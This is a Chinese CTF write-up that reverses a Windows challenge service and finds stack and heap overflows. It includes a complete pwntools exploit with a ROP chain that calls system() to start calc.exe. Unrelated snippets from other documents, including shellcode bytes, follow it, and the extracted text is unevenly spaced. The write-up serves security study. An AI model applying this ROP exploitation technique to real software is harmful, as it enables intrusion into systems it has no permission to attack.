Untitled
|
|
|
- 多 松
- 7 years ago
- Views:
Transcription
1 Exploit 3000 writeup 0x00 概述 个 人感觉这道题主要难在逆向, 各种函数还是 比较复杂的, 而且还有 一个找到尽可能多的漏洞的提 示, 让我分析的时候感觉很难受, 生怕错过了 一些漏洞 而导致拿不到分 ( 虽然到最后也没找到什么漏洞啊 T T) 挖到漏洞之后 exploitme.dll 里 面提 示的很明显了, 就是逼着你 用 ROP, 你需要什么都给你, 最后给我把 exp 写出来 不知道是不是我的 方法不对, 后 面的任务简直是体 力活啊, 累坏了 T T 果然是我的 方法不对 真 心对 Windows 不熟啊 T T 0x01 结构 我将被 striped 掉的函数名猜测还原了 一下, 具体的看 idb 就 行了 其实我原来把每个函数的变量名都还原了, 但是分析的过程中我那不争 气的电脑突然就 Kernel Panic 了, 所有变量名和函数名都没保存下来, 当时我的内 心是崩溃的 于是就没有恢复变量名了, 如果要 用我的 idb 分析的同学要 自 己再费点精 力完善了 先来看 一下程序中的 一些结构 : socket 堆结构如下 :
2 <-- 0 login_flag <-- 4 fd <-- 8 addr <-- 24 username <-- len(username) < filepath <-- $TEMP/md5(username) 这个程序涉及到 文件操作, 文件的结构如下 : <-- 0 "fnoc" <-- 4 len <-- 8 len <-- 12 md5(data1) data_all 接下来看 一下需要发送 / 接收的包的结构和对应的含义 Packet 1 首先要发 一个选择选项值的包 堆结构如下 :
3 <-- 0 "cesi" <-- 4 option_num <-- 6 length <-- length 是指下 一个包允许输 入的 长度, 也是下 一 个堆的 大 小 < 五个选项分别代表 : 0 - 登录 1 - 写 文件 2 - 重命名 3 - 读 文件 4 - 取模块地址等 重命名要求在 socket 的堆中存有 文件名, 也就是说必须先执 行 一次写 文件 Packet 2 紧接着第 二个包要输 入数据, 对于不同的选项输 入的数据有不同的含义 接收数据的堆结构如下 : <-- 0 data_len <-- 4 data <-- length 如果是登录包那么 data_length 分为两个 _WORD, 前 一个是 username 的 长 度, 后 一个是 password 的 长度 其中 1-4 四个选项中的 data 分别表 示 : 1 - 要写 入的 文件内容 2 - 新 文件名
4 3 - 要读的 文件名 4 - 模块中的函数名 0x02 漏洞 第 一步是登录, 用户名随意, 密码为 failed, 硬编码在函数中, 看 一下我 idb 中 的 auth 函数即可 在重命名 文件的函数中存在 一处栈溢出, 同时还伴随着堆溢出 : memcpy(&pszpath[v10], (const void *)(a3 + 4), *(_DWORD *) a3); 大约是 45 行左右 这句话中 memcpy 的 dest &pszpath[v10] 是在栈上的地址, 距离栈底的距离是固定的, 而 *(_DWORD *)a3 表 示要复制 长度, 这个值是来 自数据包中的 len, 也就是 用户 自 己输 入的 此处未做 *a3 的 长度检测因此可溢出栈空间, 但是要稳定地覆盖到 eip 还必须知道 文件名的 长度, 具体的 exp 后 面再说 另外在读 文件的函数中也存在 一处堆溢出 : fread(v14, 1u, v13, v15); v17 = *((_DWORD *)v14 + 1); v18 = malloc(*((_dword *)v14 + 2)); memcpy(v18, (char *)v , v17); 文件内容中的 *((_DWORD *)v14 + 1) 是 大于 *((_DWORD *)v14 + 2) 的, 所以会导致堆溢出 本来觉得这 里会有 一个任意 文件读取的逻辑漏洞, 但是很遗憾没找到, 不知道 到底有没有? 0x03 Exploit 两个堆溢出 一个栈溢出毫 无疑问会选择栈溢出, 更何况 exploitme.dll 里 面给了
5 anything you want 首先在常规情况下执 行选项 4 会得到保存临时 文件的 文件地址以及 exploitme.dll 的基址, 有了 文件名 长度就可以在栈溢出中精确地控制到 eip, 有 了模块的基址就可以在模块中任意 ROP 看到模块中的 helper, 各种 ropgadget 应有尽有, 最重要函数的 GetModuleHandle 和 GetProcddress 也具备了, 那么接下来就是写 rop 写 rop 很 辛苦的呐, 往事不堪回 首, 具体细节我也不想多说了, 看代码就 行了 吧 代码中的所有硬编码地址都是 用于编程参考的, 要么是会在运 行过程中被真实 值替换, 要么就是没有 用到, 总之在 XP 和 Win7 上都利 用成功了, 不信你试 试, 不 行再找我 author = 'w3b0rz' from pwn import * # p = remote(' ', 8888) # p = remote(' ', 8888) p = remote(' ', 8888) # Login opt = 0 length = 0x10 p.write('cesi{}{}'.format(p32(opt), p32(length))) payload = '\x04\x00\06\x00' + "user" payload += 'failed' p.write(payload.ljust(length, '\x00')) # print p.recv().encode('hex') p.recv() # Get ddr opt = 4 length = 0x20 p.write('cesi{}{}'.format(p32(opt), p32(length))) m_len = 17 payload = p32(m_len) + 'GetGlobalFunction' p.write(payload.ljust(length, '\x00'))
6 opt = 4 length = 0x20 p.write('cesi{}{}'.format(p32(opt), p32(length))) m_len = 9 payload = p32(m_len) + 'GetStatus' p.write(payload.ljust(length, '\x00')) # print p.recv().encode('hex') p.recv() p.recvuntil('valid Module ') dll_addr = int(p.recv(10), 16) p.recvuntil('path:') path = p.recv() path_len = len(path) print hex(dll_addr) print path_len opt = 1 length = 0x20 p.write('cesi{}{}'.format(p32(opt), p32(length))) payload = p32(0x04) + "TEST" p.write(payload.ljust(length, "")) # print p.recv().encode('hex') p.recv() # ROP Exp opt = 2 length = 0x300 p.write('cesi{}{}'.format(p32(opt), p32(length))) payload = p32(0x30f-path_len) payload += (0x177-path_len) * "" ### Data Segment payload += "msvcrt.dll\x00\x00" # msvcrt.dll ddr: 0x0012fc48 payload += "" * 0x10 # Not used ddr: 0x0012fc54 payload += p32(dll_addr+0x1297) # mov eax, esp ddr: 0x0012fc94 <----+
7 payload += p32(dll_addr+0x129) # sub eax, 50h ddr: 0x0012fc98 # eax: 0x0012fc48 -> msvcrt.dll ddr: 0x0012fc9c # ebx: 0x0012fcf0 payload += p32(dll_addr+0x12bf) # mov [ebx], eax ddr: 0x0012fca0 # [0x0012fcf0] = 0x0012fc48 -> msvcrt.dll payload += p32(dll_addr+0x12b8) # mov eax, ebx ddr: 0x0012fca4 payload += p32(dll_addr+0x122) # sub eax, 04h ddr: 0x0012fca8 payload += p32(dll_addr+0x129) # mov ebx, eax ddr: 0x0012fcac # ebx: 0x0012fcec payload += p32(dll_addr+0x1264) # pop eax ddr: 0x0012fcb0 payload += p32(dll_addr+0x8004) # GetModuleHandle ddr: 0x0012fcb4 payload += p32(dll_addr+0x1268) # mov eax, [eax] ddr: 0x0012fcb8 # eax: &GetModuleHandle payload += p32(dll_addr+0x1261) # mov esp, ebx ddr: 0x0012fcbc --+ payload += p32(0xdeadbeef) # Cannot use ddr: 0x0012fcc0 payload += p32(0xdeadbeef) # Cannot use ddr: 0x0012fcc4 payload += p32(0xdeadbeef) # Cannot use ddr: 0x0012fcc8 payload += p32(0xdeadbeef) # Cannot use ddr: 0x0012fccc payload += p32(0xdeadbeef) # Cannot use ddr: 0x0012fcd0 payload += p32(0xdeadbeef) # Cannot use ddr: 0x0012fcd4 payload += p32(0xdeadbeef) # Cannot use
8 ddr: 0x0012fcd8 ### Start here payload += p32(dll_addr+0x12c) # mov ebx, esp ddr: 0x0012fcdc # ebx: 0x0012fce0 payload += p32(dll_addr+0x128f) # sub esp, 50h ddr: 0x0012fce0 ** ***+ payload += p32(0xdeadbeef) # Cannot use ddr: 0x0012fce4 payload += p32(0xdeadbeef) # Cannot use ddr: 0x0012fce8 payload += p32(dll_addr+0x1270) # call eax ddr: 0x0012fcec <-+ payload += p32(0x0012fc54) # Change to Func ddr: 0x0012fcf0 ddr: 0x0012fcf4 ddr: 0x0012fcf8 ddr: 0x0012fcfc ddr: 0x0012fd00 ddr: 0x0012fd04 # ebx: 0x0012fd3c payload += p32(dll_addr+0x12bf) # mov [ebx], eax ddr: 0x0012fd08 # [0x0012fd3c] = 0x77be0000 -> Module(msvcrt.dll) payload += p32(dll_addr+0x1297) # mov eax, esp ddr: 0x0012fd0c # eax: 0x0012fd10 payload += p32(dll_addr+0x128b) # add eax, 50h ddr: 0x0012fd10 # eax: 0x0012fd60 -> system payload += p32(dll_addr+0x125) # add ebx, 04h ddr: 0x0012fd14 # ebx: 0x0012fd40 payload += p32(dll_addr+0x12bf) # mov [ebx], eax ddr: 0x0012fd18 # [0x0012fd40] = 0x0012fd60 -> system
9 payload += p32(dll_addr+0x125) # add ebx, 04h ddr: 0x0012fd1c payload += p32(dll_addr+0x125) # add ebx, 04h ddr: 0x0012fd20 # ebx: 0x0012fd48 payload += p32(dll_addr+0x129e) # sub eax, 10h ddr: 0x0012fd24 # eax: 0x0012fd50 -> calc.exe payload += p32(dll_addr+0x12bf) # mov [ebx], eax ddr: 0x0012fd28 # [0x0012fd48] = 0x0012fd50 -> calc.exe payload += p32(dll_addr+0x1264) # pop eax ddr: 0x0012fd2c payload += p32(dll_addr+0x8000) # GetProcddress ddr: 0x0012fd30 payload += p32(dll_addr+0x1268) # mov eax, [eax] ddr: 0x0012fd34 payload += p32(dll_addr+0x1270) # call eax ddr: 0x0012fd38 payload += p32(0x77be0000) # Change to Module ddr: 0x0012fd3c payload += p32(0x0012fd50) # Change to system ddr: 0x0012fd40 payload += p32(dll_addr+0x1270) # call eax ddr: 0x0012fd44 payload += p32(0x0012fd50) # Change to calc ddr: 0x0012fd48 payload += "\x00\x00\x00\x00" # Not used ddr: 0x0012fd4c ###Data Segment payload += "calc.exe" # calculator ddr: 0x0012fd50 payload += "\x00\x00\x00\x00" # Not used ddr: 0x0012fd58 payload += "\x00\x00\x00\x00" # Not used ddr: 0x0012fd5c payload += "system\x00\x00" # system ddr: 0x0012fd60 p.write(payload.ljust(length, "")) p.interactive()
10 0x04 打脸 看了 K 所有题 目 大神的 exp 才发现 自 己的 方法好笨啊 exploitme.dll 里给了 VirtualProtect 这个函数, 我真不知道这个函数可以直接关掉 DEP, 虽然在印象中确实有 用 ROP 关掉 DEP 比直接写 ROP 更 方便的印象, 但当时也没有继续去了解 ( 又欺负我不熟悉 Windows T T ) 所以 exp 的正确解法应该是调 用 exploitme.dll 里的 VirtualProtect 关掉 DEP, 然后利 用 jmp esp 这样的 gadget 直接执 行通 用 shellcode 顺带 一提, Linux 下的可以做到改变 页权限的类似函数是 mprotect 不过我这种 方法也是能成功的, 就是更 麻烦 一些 我的思路是 用 GetModuleHandle 和 GetProcddress 来找到 system() 函数的地址, 然后执 行 calc.exe
ROP_bamboofox.key
ROP Return Oriented Programming Lays @ BambooFox Who Am I Lays / L4ys / 累死 - l4ys.tw Reverse Engineering BambooFox / HITCON Outline Buffer Overflow ret2libc / ret2text Return Oriented Programming Payload
发展党员材料填写参考(上网).doc
华 中 科 技 大 学 党 员 发 展 材 料 填 写 参 考 中 共 华 中 科 技 大 学 委 员 会 组 织 部 2010 年 3 月 31 日 目 录 1 党 员 发 展 材 料 一 览 表... 1 2 入 党 志 愿 书 填 写 参 考... 2 3 申 请 入 党 积 极 分 子 培 养 考 察 登 记 表 填 写 参 考... 13 4 华 中 科 技 大 学 发 展 党 员 综 合
漏 洞 攻 防 EXPLOIT ATTACK & DEFENCE 栏 目 编 辑 脚 本 小 子 [email protected] HEAD 部 分 大 小 当 然 也 就 是 固 定 的 18200H 如 果 要 提 取 出 HEAD, 我 们 可 以 选 中 前 18200H 字
适 合 读 者 : 入 侵 爱 好 者 溢 出 爱 好 者 前 置 知 识 : 汇 编 语 言 缓 冲 区 溢 出 基 本 原 理 文 / 图 何 永 强 Word 畸 形 数 据 结 构 溢 出 漏 洞 分 析 与 利 用 以 前 都 是 写 远 程 溢 出 漏 洞, 感 觉 也 该 换 换 口 味 了 事 实 上,2005 年 以 来 的 远 程 溢 出 漏 洞, 如 MS05-039 MS06-040
要 及 时 为 入 党 积 极 分 子 确 定 两 名 培 养 联 系 人, 进 行 联 络 帮 助 要 定 期 ( 每 季 度 至 少 一 次 ) 听 取 培 养 联 系 人 的 思 想 和 工 作 情 况 汇 报, 及 时 完 成 入 党 积 极 分 子 登 记 表 ( 见 附 件 2) 的 填
中 共 兰 州 资 源 环 境 职 业 技 术 学 院 委 员 会 文 件 兰 资 环 院 党 发 2016 40 号 关 于 进 一 步 规 范 党 员 发 展 工 作 和 从 严 管 理 党 员 的 通 知 各 系 党 总 支 支 部 : 为 进 一 步 规 范 和 加 强 发 展 党 员 工 作, 从 严 管 理 党 员, 确 保 发 展 党 员 质 量, 提 高 各 基 层 党 组 织 的
生活 成长 先锋
活 动 剪 影 政 治 学 院 开 学 典 礼 开 学 典 礼 与 老 地 下 党 员 交 流 卷 首 语 新 鲜 上 财 党 校 徐 萍 昨 日 过 去 了 ; 五 月 过 去 了 ; 学 期 过 去 了 对 过 去 的 反 省 ; 对 今 日 的 思 考 ; 对 未 来 的 讨 论, 如 流 火 般 炽 热, 这 就 是 生 活 成 长 先 锋 杂 志 冬 天 对 于 秋 天 来 说 是 一 个
条 件 的 限 制, 可 在 广 西 参 加 普 通 高 考, 特 指 不 受 学 籍 户 籍 迁 入 的 年 限 限 制, 但 在 高 考 报 名 时 考 生 的 学 籍 户 籍 必 须 已 迁 入 广 西 二 外 来 人 员 需 要 提 供 的 审 查 材 料 ( 一 ) 按 照 自 治 区 招
广 西 壮 族 自 治 区 南 宁 市 招 生 考 试 院 南 招 考 院 2015 25 号 关 于 做 好 外 来 务 工 人 员 随 迁 子 女 和 外 省 户 籍 学 籍 迁 入 人 员 在 南 宁 市 参 加 2016 年 普 通 高 考 全 国 统 考 报 名 资 格 审 查 工 作 的 通 知 各 县 招 生 办, 市 区 各 普 通 高 中 中 职 学 校 : 按 照 自 治 区 招
2013年度西藏自治区教育厅
附 件 3: 西 藏 自 治 区 国 土 资 源 厅 2016 年 度 部 门 预 算 2016 年 3 月 16 日 1 目 录 第 一 部 分 西 藏 自 治 区 国 土 资 源 厅 概 况 一 主 要 职 能 二 部 门 单 位 构 成 第 二 部 分 西 藏 国 土 资 源 厅 2016 年 度 部 门 预 算 表 一 财 政 拨 款 收 支 总 表 二 一 般 公 共 预 算 支 出 表
薛 秦 高 继 宁 宋 明 锁 文 洪 梁 瑞 敏 贾 跃 进 内 蒙 古 自 治 区 (3 人 ) 琪 格 其 图 米 子 良 赵 震 生 辽 宁 省 (8 人 ) 田 素 琴 白 凤 鸣 肖 瑞 崇 黄 恩 申 白 长 川 杨 世 勇 李 敬 林 王 秀 云 吉 林 省 (5 人 ) 赵 继 福
2014 年 全 国 名 老 中 医 药 专 家 传 承 工 作 室 建 设 项 目 专 家 名 单 北 京 市 (5 人 ) 王 文 友 张 志 真 王 应 麟 黄 丽 娟 高 才 达 天 津 市 (5 人 ) 马 融 于 志 强 吴 炳 忠 武 连 仲 张 洪 义 河 北 省 (6 人 ) 韩 志 河 张 士 舜 李 淑 荣 刘 玉 洁 刘 启 泉 高 慧 山 西 省 (6 人 ) 北 京 市
一 专 业 名 称 专 业 名 称 : 会 计 二 入 学 要 求 与 基 本 学 制 入 学 要 求 : 初 中 毕 业 生 基 本 学 制 : 三 年 ; 其 中 前 二 年 为 在 校 学 习 时 间, 最 后 一 年 为 企 业 实 习 时 间 层 次 : 中 职 三 培 养 目 标 本 专
安 徽 省 滁 州 市 明 光 职 业 高 级 中 学 会 计 专 业 人 才 培 养 方 案 一 专 业 名 称 专 业 名 称 : 会 计 二 入 学 要 求 与 基 本 学 制 入 学 要 求 : 初 中 毕 业 生 基 本 学 制 : 三 年 ; 其 中 前 二 年 为 在 校 学 习 时 间, 最 后 一 年 为 企 业 实 习 时 间 层 次 : 中 职 三 培 养 目 标 本 专 业
1 CPU interrupt INT trap CPU exception
1 CPU interrupt INT trap CPU exception 2 X86 CPU gate 64 16 1 2 5 8 16 16 P DPL 00101 TSS 101 DPL P 1 64 16 1 2 1 1 3 3 5 16 16 16 P DPL 0 D 000 16 110 111 100 D 1=32 0=16 DPL P 1 INT DPL1>=CPL>=DPL CPU
考 試 日 期 :2016/04/24 教 室 名 稱 :602 電 腦 教 室 考 試 時 間 :09:50 25 26 27 28 29 30 31 32 33 34 35 36 二 技 企 管 一 胡 宗 兒 中 文 輸 入 四 技 企 四 甲 林 姿 瑄 中 文 輸 入 二 技 企 管 一
考 試 日 期 :2016/04/24 教 室 名 稱 :602 電 腦 教 室 考 試 時 間 :09:50 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 五 專 企 二 乙 胡 哲 維 中 文 輸 入 五 專 企 二 乙 周 林 昜 中 文 輸 入 五 專 企 二 乙 賴 昱 樺 中 文 輸 入 五 專 企 二 乙
IP505SM_manual_cn.doc
IP505SM 1 Introduction 1...4...4...4...5 LAN...5...5...6...6...7 LED...7...7 2...9...9...9 3...11...11...12...12...12...14...18 LAN...19 DHCP...20...21 4 PC...22...22 Windows...22 TCP/IP -...22 TCP/IP
返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需
返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需要你做很多的工作才能掌握它. 但是在次提醒本教 程不会覆盖 ROP 所有细节. 如果你想更好的理解 ROP
<4D6963726F736F667420576F7264202D20D1A7C9FACAD6B2E1B8C4D7EED6D5A3A8B4F8B1EDB8F1BCD3D2B3C2EBB0E6A3A9372E3239>
北 京 科 技 大 学 学 生 手 册 ( 本 科 生 ) 学 生 工 作 部 ( 处 ) 二 〇 一 五 年 七 月 北 京 科 技 大 学 学 生 手 册 ( 本 科 生 ) 编 委 会 主 编 于 成 文 盛 佳 伟 编 委 ( 按 姓 氏 笔 画 排 序 ) 丁 煦 生 尹 兆 华 龙 洋 史 立 伟 曲 涛 刘 晓 东 杜 振 民 杨 雄 何 进 宋 波 张 卫 冬 张 卫 钢 张 文
桂林市劳动和社会保障局关于
桂 林 市 人 力 资 源 和 社 会 保 障 局 文 件 市 人 社 发 2012 60 号 桂 林 市 人 力 资 源 和 社 会 保 障 局 关 于 2012 年 秘 书 等 十 八 个 职 业 国 家 职 业 资 格 全 国 全 区 统 一 考 试 有 关 问 题 的 通 知 各 有 关 单 位 : 根 据 自 治 区 人 力 资 源 和 社 会 保 障 厅 关 于 做 好 2012 年 国
Microsoft Word 年度选拔硕博连读研究生的通知.doc
南 工 (2015) 研 字 第 3 号 关 于 选 拔 2015 年 度 硕 博 连 读 研 究 生 的 通 知 各 有 关 学 院 : 为 适 应 我 国 构 建 社 会 主 义 和 谐 社 会 和 建 设 创 新 型 国 家 的 战 略 需 要, 加 快 拔 尖 创 新 人 才 的 培 养, 我 校 决 定 继 续 推 荐 和 选 拔 一 批 基 本 素 质 好 业 务 基 础 强 品 学 兼
Slide 1
1 分钟用 Java 原生层漏洞搞定 Win7+JRE7 一个漏洞, 三种利用 今天我们不会讲如何挖掘 Java 原生 层漏洞, 而是讲如何 料理 它们 自我介绍 趋势科技中国研发中心, 架构师 研究方向包括 漏洞挖掘, 沙盒技术, APT 攻击解决方案 重度动漫宅 议程 背景介绍 今天要使用的漏洞 Exploit 方法 1 Exploit 方法 2 Exploit 方法 3 总结 何为 Java
untitled
MPICH [email protected] 1 MPICH for Microsoft Windows 1.1 MPICH for Microsoft Windows Windows NT4/2000/XP Professional Server Windows 95/98 TCP/IP MPICH MS VC++ 6.x MS VC++.NET Compaq Visual Fortran 6.x
"\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" "\x99\x1c\x3d\x27\xef\x8
Writing W32 shellcode 译者 :Netfairy 前言 欢迎继续! 以前我们都是用现成的 shellcode, 今天我们将从头开始写我们自己的 shellcode. 这是一个十分有用的练习, 两个原因 : (1) 如果有一个漏洞有严重的空间限制 (2) 理解 ROP( 返回导向编程 ) 的好办法 为了加快速度我决定使用第一部分为 "FreeFloat FTP" 写的漏洞利用框架.
untitled
XP248 1 XP248 XP248 DCS PLC SCnet SCnet DCS SCnet DCS 1.1 XP248 Modbus HostLink Modbus XP248 4 DB25 XP248 MODBUS XP248 SCControl XP248 4 RS232 RS485 4 32 XP248 COM0-COM1 COM2-COM3 1200 19200bit/s 5 8 1
软件概述
Cobra DocGuard BEIJING E-SAFENET SCIENCE & TECHNOLOGY CO.,LTD. 2003 3 20 35 1002 010-82332490 http://www.esafenet.com Cobra DocGuard White Book 1 1....4 1.1...4 1.2 CDG...4 1.3 CDG...4 1.4 CDG...5 1.5
ebook140-9
9 VPN VPN Novell BorderManager Windows NT PPTP V P N L A V P N V N P I n t e r n e t V P N 9.1 V P N Windows 98 Windows PPTP VPN Novell BorderManager T M I P s e c Wi n d o w s I n t e r n e t I S P I
Windows XP
Windows XP What is Windows XP Windows is an Operating System An Operating System is the program that controls the hardware of your computer, and gives you an interface that allows you and other programs
DOS下常用的网络命令.PDF
DOS .... 1.1... 1.2... DOS... 2.1 ARP... 2.2 Finger... 2.3 Ftp... 2.4 Nbtstat... 2.5 Netstat... 2.6 Ping... 2.7 Rcp... 2.8 Rexec... 2.9 Route... 2.10 Rsh... 2.11 Tftp... 2.12 Tracert... 1 1 1 1 1 2 3 4
2015年第五届“华为杯”全国大学生智能设计竞赛通知
2016 年 第 六 届 华 为 杯 中 国 大 学 生 智 能 设 计 竞 赛 通 知 各 高 校 教 务 处 相 关 院 系 : 2016 年 第 六 届 华 为 杯 中 国 大 学 生 智 能 设 计 竞 赛 ( 以 下 简 称 竞 赛 ), 将 于 今 年 1 月 至 8 月 在 电 子 科 技 大 学 举 办 竞 赛 旨 在 展 示 和 锻 炼 大 学 生 采 用 智 能 科 学 技 术
(一)宿舍生活解惑區
歡 迎 來 到 嘉 大 蘭 潭 校 區 宿 舍 手 冊 1 宿 舍 環 境 與 文 化 之 營 造 生 活 輔 導 組 江 政 達 組 長 大 學 校 園 是 一 個 開 放 的 學 習 環 境 與 空 間, 一 切 資 源 大 家 可 以 共 同 分 享 使 用 學 生 宿 舍 裏 面 的 公 共 區 域 與 寢 室, 是 同 學 們 在 校 園 裡 面 能 夠 擁 有 且 能 自 主 的 空 間,
软件测试(TA07)第一学期考试
一 判 断 题 ( 每 题 1 分, 正 确 的, 错 误 的,20 道 ) 1. 软 件 测 试 按 照 测 试 过 程 分 类 为 黑 盒 白 盒 测 试 ( ) 2. 在 设 计 测 试 用 例 时, 应 包 括 合 理 的 输 入 条 件 和 不 合 理 的 输 入 条 件 ( ) 3. 集 成 测 试 计 划 在 需 求 分 析 阶 段 末 提 交 ( ) 4. 单 元 测 试 属 于 动
LP5_104017_警用應勤裝備_採購規範
契 約 條 款 附 件 一 ~ 一 組 別 招 標 案 號 :LP5-104017 警 用 應 勤 裝 備 採 購 品 項 及 各 項 適 用 訂 購 數 量 級 距 表 項 次 品 名 1 呼 氣 酒 精 分 析 儀 訂 購 數 量 限 1 台 ( 含 ) 以 上,20 台 ( 含 ) 以 下 第 1 組 呼 氣 酒 精 分 析 儀 第 2 組 呼 氣 酒 精 測 試 器 2 呼 氣 酒 精 分
Windows RTEMS 1 Danilliu MMI TCP/IP QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos eco
Windows RTEMS 1 Danilliu MMI TCP/IP 80486 QEMU i386 QEMU ARM POWERPC i386 IPC PC104 uc/os-ii uc/os MMI TCP/IP i386 PORT Linux ecos Linux ecos ecos ecos Email www.rtems.com RTEMS ecos RTEMS RTEMS Windows
<4D6963726F736F667420576F7264202D20C7B6C8EBCABDCFB5CDB3C9E8BCC6CAA6B0B8C0FDB5BCD1A75FD1F9D5C22E646F63>
因 为 路 过 你 的 路, 因 为 苦 过 你 的 苦, 所 以 快 乐 着 你 的 快 乐, 追 逐 着 你 的 追 逐 内 容 简 介 本 书 根 据 2005 年 下 半 年 实 施 的 全 国 计 算 机 技 术 与 软 件 专 业 技 术 资 格 ( 水 平 ) 考 试 嵌 入 式 系 统 设 计 师 级 考 试 大 纲 精 神, 在 深 入 研 究 历 年 计 算 机 技 术 与 软
PowerPoint Presentation
TOEFL Practice Online User Guide Revised September 2009 In This Guide General Tips for Using TOEFL Practice Online Directions for New Users Directions for Returning Users 2 General Tips To use TOEFL Practice
银川一职服装设计与工艺专业教学计划
银 川 职 业 技 术 学 院 电 子 工 程 部 现 代 物 流 专 业 2013 级 实 施 性 教 学 计 划 ( 专 业 代 码 :121900) 一 招 生 对 象 与 学 制 招 生 对 象 : 应 届 初 中 毕 业 生 学 制 : 全 日 制 3 年 (2+1, 第 五 六 学 期 顶 岗 实 习 ) 采 用 2+1 人 才 培 养 模 式, 即 两 年 在 校 学 习, 第 三 年
目 錄 ~ 升 學 篇 ~ 壹 技 專 校 院 考 招 分 離 制 度 簡 介 2 貳 105 學 年 統 一 入 學 測 驗 重 要 日 程 表 3 參 105 學 年 度 四 技 二 專 統 一 入 學 測 驗 考 試 類 別 與 考 試 科 目 一 覽 表 4 肆 技 專 院 校 招 生 管
國 立 北 港 高 級 農 工 職 業 學 校 104 學 年 度 學 生 進 路 輔 導 手 冊 中 華 民 國 105 年 2 月 輔 導 室 編 印 目 錄 ~ 升 學 篇 ~ 壹 技 專 校 院 考 招 分 離 制 度 簡 介 2 貳 105 學 年 統 一 入 學 測 驗 重 要 日 程 表 3 參 105 學 年 度 四 技 二 專 統 一 入 學 測 驗 考 試 類 別 與 考 試 科
国 培 简 讯 国 培 计 划 (2012) 示 范 性 集 中 培 训 项 目 国 培 计 划 (2012) 中 小 学 教 师 示 范 性 集 中 培 训 暨 中 西 部 农 村 教 师 集 中 培 训 中 小 学 骨 干 教 师 北 京 外 国 语 大 学 英 语 学 科 研 修 项 目 毕
国 培 简 讯 国 培 计 划 (2012) 示 范 性 集 中 培 训 项 目 国 培 计 划 (2012) 中 小 学 教 师 示 范 性 集 中 培 训 暨 中 西 部 农 村 教 师 集 中 培 训 中 小 学 骨 干 教 师 北 京 外 国 语 大 学 英 语 学 科 研 修 项 目 毕 业 典 礼 隆 重 召 开 安 徽 省 广 德 县 誓 节 镇 中 心 小 学 陈 吉 龙 2012
AL-M200 Series
NPD4754-00 TC ( ) Windows 7 1. [Start ( )] [Control Panel ()] [Network and Internet ( )] 2. [Network and Sharing Center ( )] 3. [Change adapter settings ( )] 4. 3 Windows XP 1. [Start ( )] [Control Panel
EPSON
NPD 4956-00 TC .... 5....5....5....6 SSL/TLS....7 IP....8....8....9 Web Config...10 Web Config...11 EpsonNet Config...12 EpsonNet Config Windows...13 EpsonNet Config Windows...13 EpsonNet Config - Windows...
2015年第五届“华为杯”全国大学生智能设计竞赛通知
2015 年 第 五 届 华 为 杯 中 国 大 学 生 智 能 设 计 竞 赛 通 知 各 高 校 : 为 了 普 及 智 能 科 学 知 识, 展 示 和 锻 炼 大 学 生 采 用 智 能 科 学 技 术 不 理 论 解 决 问 题 的 能 力, 提 高 大 学 生 的 综 合 设 计 能 力, 培 养 大 学 生 的 创 新 意 识 团 队 合 作 精 神, 促 进 高 等 学 校 智 能
05 01 X Window X Window Linux Linux X Window X Window Webmin Web Linux Linux X Window X Window Notebook PC X Window X Window module Linux Linux kernel
Linux sub bash test2.sh sub bash test.sh test2.sh sub bash var1 123 123 test.sh test2.sh var1 bash sub bash var1 bash 01 5-4 X Window X Window X Window Linux Server X Window CPU2006 Linux X Window benchmark
ebook65-5
5 P e r l P e r l I / O P e r l P e r l P e r l P e r l P e r l I / O P e r l P e r l 5.1 P e r l P e r ( ) S T D I N P e r l S T D I N 2 $ @ P e r l f o r e a c h e l s e i f P e r l p e r l f u n c o
Microsoft Word - 10 baogao_112_128.doc
報 告 ( 一 ) 作 用 報 告 是 一 種 帶 有 敘 述 說 明 性 質 的 文 書, 可 以 是 下 級 用 來 向 上 級 敘 述 或 匯 報 某 些 事 情 或 工 作 進 展 的 文 件, 也 可 以 是 某 些 機 關 團 體 對 其 成 員 會 眾, 或 受 委 托 者 對 委 托 者 就 特 定 事 情 的 報 告 ; 可 以 用 來 介 紹 狀 況 分 析 現 象 說 明 原
ebook140-8
8 Microsoft VPN Windows NT 4 V P N Windows 98 Client 7 Vintage Air V P N 7 Wi n d o w s NT V P N 7 VPN ( ) 7 Novell NetWare VPN 8.1 PPTP NT4 VPN Q 154091 M i c r o s o f t Windows NT RAS [ ] Windows NT4
A Preliminary Implementation of Linux Kernel Virus and Process Hiding
邵 俊 儒 翁 健 吉 妍 年 月 日 学 号 学 号 学 号 摘 要 结 合 课 堂 知 识 我 们 设 计 了 一 个 内 核 病 毒 该 病 毒 同 时 具 有 木 马 的 自 动 性 的 隐 蔽 性 和 蠕 虫 的 感 染 能 力 该 病 毒 获 得 权 限 后 会 自 动 将 自 身 加 入 内 核 模 块 中 劫 持 的 系 统 调 用 并 通 过 简 单 的 方 法 实 现 自 身 的
EPSON
NPD5493-00 TC .... 5....5....5....6 SSL/TLS....7....7 IP....8.... 8 Web Config...9 Web Config...10 EpsonNet Config...11 EpsonNet Config Windows...11 EpsonNet Config Windows...11 EpsonNet Config - Windows...
Junos Pulse Mobile Security R1 2012, Juniper Networks, Inc.
Junos Pulse Mobile Security 4.0 2012 6 R1 2012, Juniper Networks, Inc. Junos Pulse Mobile Security Juniper Networks, Inc. 1194 North Mathilda Avenue Sunnyvale, California 94089 408-745-2000 www.juniper.net
<4D F736F F D D342DA57CA7DEA447B14D2DA475B57BBB50BADEB27AC3FEB14DA447B8D5C344>
